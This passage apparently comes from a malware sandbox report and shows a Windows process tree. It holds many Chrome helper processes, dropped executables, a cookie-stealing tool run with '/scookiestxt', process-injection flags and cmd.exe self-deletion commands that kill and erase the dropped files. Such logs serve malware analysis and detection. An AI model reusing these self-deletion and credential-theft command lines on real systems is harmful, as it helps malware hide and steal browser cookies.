                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1840 /prefetch:8
                                                                                                                          8⤵
                                                                                                                            PID:4844
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:5672
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5124 /prefetch:8
                                                                                                                              8⤵
                                                                                                                                PID:4816
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:8
                                                                                                                                8⤵
                                                                                                                                  PID:2348
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1448 /prefetch:8
                                                                                                                                  8⤵
                                                                                                                                    PID:4292
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
                                                                                                                                    8⤵
                                                                                                                                      PID:5368
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5168 /prefetch:8
                                                                                                                                      8⤵
                                                                                                                                        PID:5436
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5176 /prefetch:8
                                                                                                                                        8⤵
                                                                                                                                          PID:5808
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:8
                                                                                                                                          8⤵
                                                                                                                                            PID:6108
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:8
                                                                                                                                            8⤵
                                                                                                                                              PID:5272
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1668 /prefetch:8
                                                                                                                                              8⤵
                                                                                                                                                PID:5220
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4300 /prefetch:8
                                                                                                                                                8⤵
                                                                                                                                                  PID:5228
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:8
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6140
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5428 /prefetch:8
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6112
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
                                                                                                                                                      8⤵
                                                                                                                                                        PID:4680
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:8
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5252
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3148 /prefetch:8
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5868
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5500 /prefetch:8
                                                                                                                                                            8⤵
                                                                                                                                                              PID:4468
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4220 /prefetch:8
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4364
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2412
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3716 /prefetch:8
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:4252
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3536 /prefetch:8
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5596
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:8
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:3084
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1404 /prefetch:8
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:5260
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4808
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:1280
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:6132
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5176 /prefetch:8
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5968
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:8
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:5712
                                                                                                                                                                              • C:\Users\Admin\Documents\f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\f63HbxfV2WYcYU58wgLyTehf.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                PID:516
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:4424
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5004
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:3152
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:732
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2100
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 24
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:5292
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\Documents\f63HbxfV2WYcYU58wgLyTehf.exe & exit
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:6108
                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                        ping 0
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                        PID:2436
                                                                                                                                                                                  • C:\Users\Admin\Documents\dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\dbQ3iIm0h1LDkWoDgn5v_vH9.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:1256
                                                                                                                                                                                    • C:\Users\Admin\Documents\dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                      "{path}"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4984
                                                                                                                                                                                  • C:\Users\Admin\Documents\2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\2aNJWnHICffmGqno89GuHbVV.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4224
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 656
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:1608
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 668
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4552
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 768
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:2416
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 804
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4156
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1076
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:64
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1276
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4024
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1252
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:760
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1252
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4196
                                                                                                                                                                                  • C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:4584
                                                                                                                                                                                    • C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:3644
                                                                                                                                                                                  • C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:4168
                                                                                                                                                                                    • C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      PID:5164
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im BN2v6gd1v89066wDB6eRa3Rp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:4108
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill /im BN2v6gd1v89066wDB6eRa3Rp.exe /f
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:5432
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:5260
                                                                                                                                                                                    • C:\Users\Admin\Documents\VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\VpYfqWTsvrvmk4DESisFXHov.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      PID:4188
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im VpYfqWTsvrvmk4DESisFXHov.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VpYfqWTsvrvmk4DESisFXHov.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:4276
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill /im VpYfqWTsvrvmk4DESisFXHov.exe /f
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:3084
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:4352
                                                                                                                                                                                      • C:\Users\Admin\Documents\vt_ASiQuT3fR9eoJIz5PVk6E.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\vt_ASiQuT3fR9eoJIz5PVk6E.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4852
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 920
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:4408
                                                                                                                                                                                      • C:\Users\Admin\Documents\1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\1um0tg3NcHdOWZT14jfQXEXD.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:4848
                                                                                                                                                                                      • C:\Users\Admin\Documents\6y5Asuc92ZuzKRh2hOocPm4U.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\6y5Asuc92ZuzKRh2hOocPm4U.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        PID:4720
                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5148
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5640
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2348
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4220
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:4136
                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            PID:5172
                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            PID:5156
                                                                                                                                                                                            • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                                              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:5364
                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\file4.exe"
              7⤵
              • Executes dropped EXE
              PID:5140
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_7.exe
        4⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_7.exe
          arnatic_7.exe
          5⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_7.exe
            6⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:184
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_4.exe
        4⤵
        • Suspicious use of WriteProcessMemory
        PID:2288
        • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_4.exe
          arnatic_4.exe
          5⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:728
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            6⤵
            • Executes dropped EXE
            PID:2452
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            6⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:4620
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            6⤵
            • Executes dropped EXE
            PID:5360
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            6⤵
            PID:2420
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_2.exe
        4⤵
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_2.exe
          arnatic_2.exe
          5⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:988
• \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s BITS
  1⤵
  • Suspicious use of SetThreadContext
  • Modifies data under HKEY_USERS
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  • Suspicious use of WriteProcessMemory
  PID:4000
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k SystemNetworkService
    2⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    PID:2084
• C:\Users\Admin\AppData\Local\Temp\8936.exe
  C:\Users\Admin\AppData\Local\Temp\8936.exe
  1⤵
  • Executes dropped EXE
  PID:584
  • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
